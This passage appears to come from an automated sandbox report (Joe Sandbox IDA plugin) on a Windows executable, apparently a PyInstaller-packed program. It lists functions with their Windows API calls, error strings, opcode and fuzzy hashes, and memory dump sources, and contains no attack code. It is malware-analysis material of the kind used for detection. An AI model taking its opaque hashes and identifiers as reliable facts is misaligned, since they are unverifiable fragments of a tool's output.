                                                                                      • _fread_nolock.LIBCMT ref: 00007FF7F3DD1A1B
                                                                                        • Part of subcall function 00007FF7F3DD2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7F3DD1B6A), ref: 00007FF7F3DD295E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _fread_nolock$CurrentProcess
                                                                                      • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                      • API String ID: 2397952137-3497178890
                                                                                      • Opcode ID: e060d84aa5bf36d8a380aea433863807716a2bfcfbbc2a242715e1548c9dcf31
                                                                                      • Instruction ID: c0abb39bb4e068bbccd6192fcc26d7cc6bf6f57499df95413ff2afa3bbc1c1a6
                                                                                      • Opcode Fuzzy Hash: e060d84aa5bf36d8a380aea433863807716a2bfcfbbc2a242715e1548c9dcf31
                                                                                      • Instruction Fuzzy Hash: C9819271A0D68385EBE0EBA4D0412B9B3A4FF48744F844531E9AD6B7C9DE3CE58587A0

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                      • API String ID: 2050909247-1550345328
                                                                                      • Opcode ID: f6eb3f98450cbc5f74df1446d4150ca3e377cb8f23e7e3bf82aec3682dfd8963
                                                                                      • Instruction ID: 49c70b0aacbad83e1b3dc2436593b74adcfd4fa2dc1f5cb23b310c3ec4c07e38
                                                                                      • Opcode Fuzzy Hash: f6eb3f98450cbc5f74df1446d4150ca3e377cb8f23e7e3bf82aec3682dfd8963
                                                                                      • Instruction Fuzzy Hash: 99519E61B0964392EB94BBA194401B9B3A4FF84B94FC44631ED3C2F7D6DE3CE58587A0

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetTempPathW.KERNEL32(?,?,00000000,00007FF7F3DD3CBB), ref: 00007FF7F3DD8704
                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7F3DD3CBB), ref: 00007FF7F3DD870A
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00007FF7F3DD3CBB), ref: 00007FF7F3DD874C
                                                                                        • Part of subcall function 00007FF7F3DD8830: GetEnvironmentVariableW.KERNEL32(00007FF7F3DD388E), ref: 00007FF7F3DD8867
                                                                                        • Part of subcall function 00007FF7F3DD8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7F3DD8889
                                                                                        • Part of subcall function 00007FF7F3DE8238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DE8251
                                                                                        • Part of subcall function 00007FF7F3DD2810: MessageBoxW.USER32 ref: 00007FF7F3DD28EA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                      • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                      • API String ID: 3563477958-1339014028
                                                                                      • Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                      • Instruction ID: 5460fdd844c23a0caff50222cc78e142a0a5b6fb2ca46bdd174d2b9a71add00c
                                                                                      • Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                      • Instruction Fuzzy Hash: 9B419F11A1964254FB96B7E1A8652B9A290AF84BC0FC04131ED3D6F7DADE3CE545C3E0

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                      • API String ID: 2050909247-2813020118
                                                                                      • Opcode ID: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
                                                                                      • Instruction ID: d1f98d6a146640630b6d44f97480d82eaf7043d5bf68b8ae6c1c38cafc661599
                                                                                      • Opcode Fuzzy Hash: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
                                                                                      • Instruction Fuzzy Hash: F3510622A0964341EBE4BBA1A4403BAB691FF44794FC44135ED6D6B7C5DE3CE441C790

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF7F3DD3804), ref: 00007FF7F3DD36E1
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD3804), ref: 00007FF7F3DD36EB
                                                                                        • Part of subcall function 00007FF7F3DD2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F3DD3706,?,00007FF7F3DD3804), ref: 00007FF7F3DD2C9E
                                                                                        • Part of subcall function 00007FF7F3DD2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F3DD3706,?,00007FF7F3DD3804), ref: 00007FF7F3DD2D63
                                                                                        • Part of subcall function 00007FF7F3DD2C50: MessageBoxW.USER32 ref: 00007FF7F3DD2D99
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                      • API String ID: 3187769757-2863816727
                                                                                      • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                      • Instruction ID: 6e3e81b34d53e10b69dc84d0416274b69e031a06a4304550f486cd0837dcf434
                                                                                      • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                      • Instruction Fuzzy Hash: AC216251B18A4291FBA0B764E8513B6F250BF88394FC00231E57DAA5D9EE2CE505C7A0

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                      • Instruction ID: 2ae60ac12aab64c9a0cb1b4a75a229ac41baac33c10c3e2c4ddd982db18a7b32
                                                                                      • Opcode Fuzzy Hash: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                      • Instruction Fuzzy Hash: EDC1092290D68741E7E96B9594402BDBF50FB81B80FD54231EE6E2B3D1CE7CF48587A2

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                      • String ID:
                                                                                      • API String ID: 995526605-0
                                                                                      • Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                      • Instruction ID: 39c2c2dd1efad5beee1ad3935f86356d63acf98b9d2b951d9ca8f070a925fc3f
                                                                                      • Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                      • Instruction Fuzzy Hash: E4217531A0C64642EB90ABA5B48023AF3A0EF85BF0F940235EA7D5B7E8DE7CD4458750

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7F3DD8570: GetCurrentProcess.KERNEL32 ref: 00007FF7F3DD8590
                                                                                        • Part of subcall function 00007FF7F3DD8570: OpenProcessToken.ADVAPI32 ref: 00007FF7F3DD85A3
                                                                                        • Part of subcall function 00007FF7F3DD8570: GetTokenInformation.KERNELBASE ref: 00007FF7F3DD85C8
                                                                                        • Part of subcall function 00007FF7F3DD8570: GetLastError.KERNEL32 ref: 00007FF7F3DD85D2
                                                                                        • Part of subcall function 00007FF7F3DD8570: GetTokenInformation.KERNELBASE ref: 00007FF7F3DD8612
                                                                                        • Part of subcall function 00007FF7F3DD8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7F3DD862E
                                                                                        • Part of subcall function 00007FF7F3DD8570: CloseHandle.KERNEL32 ref: 00007FF7F3DD8646
                                                                                      • LocalFree.KERNEL32(?,00007FF7F3DD3C55), ref: 00007FF7F3DD916C
                                                                                      • LocalFree.KERNEL32(?,00007FF7F3DD3C55), ref: 00007FF7F3DD9175
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                      • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                      • API String ID: 6828938-1529539262
                                                                                      • Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                      • Instruction ID: 5c559135aa7fa92dd1b9bc85adf760504fe181482b3f7e05a792f7f0c7c96ced
                                                                                      • Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                      • Instruction Fuzzy Hash: A6215321A0874281F790BBA0E8552EAB361FF84780FC44135EA6D6B7D9DF3CE84587E0

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F3DECF4B), ref: 00007FF7F3DED07C
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F3DECF4B), ref: 00007FF7F3DED107
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleErrorLastMode
                                                                                      • String ID:
                                                                                      • API String ID: 953036326-0
                                                                                      • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                      • Instruction ID: 5d4a17a707d31ee137a09be358ea6f9a4a5ced167c832bacbbe15f653786dc87
                                                                                      • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                      • Instruction Fuzzy Hash: 7591C832E1865189F794AFA5944027DBFA0BB44B88F944239DE2E7B6C4CF38D486C771

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 1279662727-0
                                                                                      • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                      • Instruction ID: 714d68a3b1f627837104b0eeca460a53cc4737b17a2adef9702c5448021356c5
                                                                                      • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                      • Instruction Fuzzy Hash: C641DB22D1878283E398ABA09550379B761FB947A4F508334E67C17AD1DF7CE4E087A1

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                      • String ID:
                                                                                      • API String ID: 3251591375-0
                                                                                      • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                      • Instruction ID: 2d1483e0e7626e00bd2ea0e0d71504a7b278995b90a41101671c79cd4546b98d
                                                                                      • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                      • Instruction Fuzzy Hash: 4E314E20E0914341FFD4BBF598513B9B6819F41788FC44134EA2E6F2DBDE2CA44A82F1
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                      • Instruction ID: 6165f8212c5dfa928c3ec2d0f3d1e5d033899bd9e9cf81c847d43f4ef5a5fe5e
                                                                                      • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                      • Instruction Fuzzy Hash: E251FC21B0924186E7ACBAE7940067AE991BF44BA4F884734DD7D6F7C5CE3CD481C6B2
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastPointer
                                                                                      • String ID:
                                                                                      • API String ID: 2976181284-0
                                                                                      • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                      • Instruction ID: 5c76688e600b584057507513bfef81433e2cd7577ee3d0ae3c97f81b026e4a56
                                                                                      • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                      • Instruction Fuzzy Hash: 8B110122B08B8281DBA4AB65A840169F761AB45FF0F944331EE7D1F7E8CE7CD0948781
                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA95E
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA968
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 485612231-0
                                                                                      • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                      • Instruction ID: cf2d705471936071a84183b19d9fe14e29fd9734a0b2c24156107a0782ec1dcb
                                                                                      • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                      • Instruction Fuzzy Hash: 0DE04F50E0920342FF8D7BF258951389A515F98B00FC40130D83D6E2D1DD2CA88183B1
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?,?,?,00007FF7F3DEA9D5,?,?,00000000,00007FF7F3DEAA8A), ref: 00007FF7F3DEABC6
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7F3DEA9D5,?,?,00000000,00007FF7F3DEAA8A), ref: 00007FF7F3DEABD0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseErrorHandleLast
                                                                                      • String ID:
                                                                                      • API String ID: 918212764-0
                                                                                      • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                      • Instruction ID: 9f08c8840a6c9606848a49971f907b8bca6f74ac38dad4e15623bbf5e44a626c
                                                                                      • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                      • Instruction Fuzzy Hash: 0E21F610B1869341FBDD77E19480379AA929F84BA0F844339E93E6F7C1CE6CA4C143A2
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
